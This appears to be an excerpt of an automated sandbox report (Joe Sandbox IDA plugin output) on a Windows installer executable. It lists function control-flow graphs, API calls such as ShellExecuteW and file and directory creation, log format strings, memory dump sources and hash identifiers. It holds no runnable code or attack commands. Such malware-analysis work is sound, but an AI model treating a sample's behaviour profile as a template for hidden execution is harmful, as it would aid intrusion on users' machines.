                                      • Associated: 00000000.00000002.1717882830.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1718024111.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_94e.jbxd
                                      Similarity
                                      • API ID: PrivateProfileStringWritelstrcpyn
                                      • String ID: <RM>$SortsCestVoltageEfficiency$WriteINIStr: wrote [%s] %s=%s in %s
                                      • API String ID: 247603264-1859042924
                                      • Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                      • Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
                                      • Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                      • Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 750 405073-405091 OleInitialize call 403ddb 752 405096-405098 750->752 753 4050c7-4050de call 403ddb OleUninitialize 752->753 754 40509a 752->754 755 40509d-4050a3 754->755 757 4050e1-4050ec call 4062cf 755->757 758 4050a5-4050bf call 4062cf call 40139d 755->758 765 4050ed-4050f5 757->765 758->765 768 4050c1 758->768 765->755 767 4050f7 765->767 767->753 768->753
                                      APIs
                                      • OleInitialize.OLE32(00000000), ref: 00405083
                                        • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                      • OleUninitialize.OLE32(00000404,00000000), ref: 004050D1
                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1717823994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1717806685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717858908.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1718024111.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_94e.jbxd
                                      Similarity
                                      • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                      • String ID: Section: "%s"$Skipping section: "%s"
                                      • API String ID: 2266616436-4211696005
                                      • Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                      • Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
                                      • Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                      • Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 769 4021b5-40220b call 40145c * 4 call 404f9e ShellExecuteW 780 402223-4030f2 call 4062cf 769->780 781 40220d-40221b call 4062cf 769->781 781->780
                                      APIs
                                        • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00427976,74DF23A0,00000000), ref: 00404FD6
                                        • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00427976,74DF23A0,00000000), ref: 00404FE6
                                        • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427976,74DF23A0,00000000), ref: 00404FF9
                                        • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                      • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202
                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                      Strings
                                      • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                      • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1717823994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1717806685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717858908.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1718024111.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_94e.jbxd
                                      Similarity
                                      • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                      • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                      • API String ID: 3156913733-2180253247
                                      • Opcode ID: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                      • Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
                                      • Opcode Fuzzy Hash: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                      • Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 789 405eab-405eb7 790 405eb8-405eec GetTickCount GetTempFileNameW 789->790 791 405efb-405efd 790->791 792 405eee-405ef0 790->792 794 405ef5-405ef8 791->794 792->790 793 405ef2 792->793 793->794
                                      APIs
                                      • GetTickCount.KERNEL32 ref: 00405EC9
                                      • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1717823994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1717806685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717858908.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1718024111.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_94e.jbxd
                                      Similarity
                                      • API ID: CountFileNameTempTick
                                      • String ID: nsa
                                      • API String ID: 1716503409-2209301699
                                      • Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                      • Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
                                      • Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                      • Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 795 402175-40218b call 401446 * 2 800 402198-40219d 795->800 801 40218d-402197 call 4062cf 795->801 802 4021aa-4021b0 EnableWindow 800->802 803 40219f-4021a5 ShowWindow 800->803 801->800 805 4030e3-4030f2 802->805 803->805
                                      APIs
                                      • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                      • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1717823994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1717806685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717858908.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1718024111.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_94e.jbxd
                                      Similarity
                                      • API ID: Window$EnableShowlstrlenwvsprintf
                                      • String ID: HideWindow
                                      • API String ID: 1249568736-780306582
                                      • Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                      • Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
                                      • Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                      • Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D
                                      APIs
                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                      • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1717823994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1717806685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717858908.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1718024111.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_94e.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID:
                                      • API String ID: 3850602802-0
                                      • Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                      • Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
                                      • Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                      • Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C
                                      APIs
                                      • GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                      • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1717823994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1717806685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717858908.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1718024111.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_94e.jbxd
                                      Similarity
                                      • API ID: File$AttributesCreate
                                      • String ID:
                                      • API String ID: 415043291-0
                                      • Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                      • Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
                                      • Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                      • Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15
                                      APIs
                                      • GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1717823994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1717806685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717858908.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1718024111.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_94e.jbxd
                                      Similarity
                                      • API ID: AttributesFile
                                      • String ID:
                                      • API String ID: 3188754299-0
                                      • Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                      • Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
                                      • Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                      • Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19
                                      APIs
                                      • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1717823994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1717806685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717858908.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1718024111.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_94e.jbxd
                                      Similarity
                                      • API ID: FileRead
                                      • String ID:
                                      • API String ID: 2738559852-0
                                      • Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                      • Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
                                      • Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                      • Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4
                                      APIs
                                        • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                        • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                        • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                        • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                      • CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1717823994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1717806685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717858908.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1718024111.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_94e.jbxd
                                      Similarity
                                      • API ID: Char$Next$CreateDirectoryPrev
                                      • String ID:
                                      • API String ID: 4115351271-0
                                      • Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                      • Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
                                      • Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                      • Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE
                                      APIs
                                      • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1717823994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1717806685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717858908.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1718024111.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_94e.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID:
                                      • API String ID: 3850602802-0
                                      • Opcode ID: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                      • Instruction ID: 85c9fcbfeeb581dd75f9c62538f5ff43d76368f59f1a6e3d2bff8e12452ff276
                                      • Opcode Fuzzy Hash: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                      • Instruction Fuzzy Hash: 0FC04C75644201BBDA108B509D45F077759AB90701F1584257615F50E0C674D550D62C
                                      APIs
                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1717823994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1717806685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717858908.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1718024111.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_94e.jbxd
                                      Similarity
                                      • API ID: FilePointer
                                      • String ID:
                                      • API String ID: 973152223-0
                                      • Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                      • Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
                                      • Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                      • Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C
                                      APIs
                                      • SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1717823994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1717806685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717858908.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1718024111.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_94e.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID:
                                      • API String ID: 3850602802-0
                                      • Opcode ID: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                      • Instruction ID: 19f7ed481b0b3084dfc48602985d3e47af739273f13ec77122cd0735a5794091
                                      • Opcode Fuzzy Hash: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                      • Instruction Fuzzy Hash: CCB01235181200BBDE514B00DE0AF867F62F7A8701F008574B305640F0C6B204E0DB09
                                      APIs
                                      • KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1717823994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1717806685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717858908.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
